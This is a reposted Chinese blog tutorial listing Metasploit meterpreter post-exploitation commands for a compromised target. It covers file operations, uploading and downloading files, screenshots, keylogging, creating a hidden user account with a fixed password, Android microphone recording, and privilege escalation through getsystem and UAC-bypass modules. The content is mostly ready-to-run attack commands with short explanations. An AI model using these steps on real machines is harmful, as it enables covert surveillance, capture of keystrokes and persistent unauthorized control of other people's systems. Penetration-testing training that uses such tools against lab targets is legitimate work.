0


msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)

1、文件交互指令

Command****Descriptioncd{路径}切换靶机目录cat读取文件目录cp 复制文件到目标mv移动到目标chmod修改文件的权限(chmod 777 shell.elf)del/rm删除靶机目录dir打印靶机目录mkdir在靶机上创建目录rmdir靶机删除目录edit{文件所在地址或名}编辑文件getlwd打印本地目录路径getwd打印靶机目录路径lcd更改本地目录lls列出本地目录
ls
列出靶机的目录lpwd打印本地目录pwd打印工作目录search搜索文件 详细search -hetc


2、上传下载文件(windows)

Command****Descriptionupload传文件到靶机 download从靶机下载文件

3、屏幕截图(windows)

Command****Descriptionscreenshot截图(Windows)

4、键盘记录(windows)

1、先启动记录keyscan_start

2、显示键盘输入内容keyscan_dump

3、结束监控keyscan_stop


5、创建账户(windows)

1、先看下目标靶机已存在用户

meterpreter中输入:run post/windows/gather/enum_logged_on_users

2、使用getgui创建 一个用户名为 xiaowei 密码为 123456 的账户

run getgui -u xiaowei -p 123456

run getgui -u {用户名}-p {密码}

** 注意:**

    创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。

如果仍然出现错误,绕过UAC提权:

  • 先输入bg,进入后台

  • 使用这个模块use exploit/windows/local/ask
  • options查看需要配置哪些模块

  • run

6、音频录像(Android)

record_mic -h 查看使用方法

开始录音


7、提权(Windows)

先输入getuid查看当前用户的权限,可知为普通用户。

方法一:

getsystem

方法二:

使用msf模块提权

先进入msf后台bg或者background

  1. 查询可以提权的模块 search bypassuac 查看提权模块
  2. 选择一个适合当前系统的提权模块 use 1(如果没有成功就选择其他模块)
  3. 配置模块使用参数 options (session值可以在终端直接输入session得到)
  4. 可以看到需要配置session set session {需要提权的session id}
  5. 执行提权 run
  6. 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限

本文转载自: https://blog.csdn.net/m0_61506558/article/details/126627850
版权归原作者 @Camelus 所有, 如有侵权,请联系我们删除。

“msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)”的评论:

还没有评论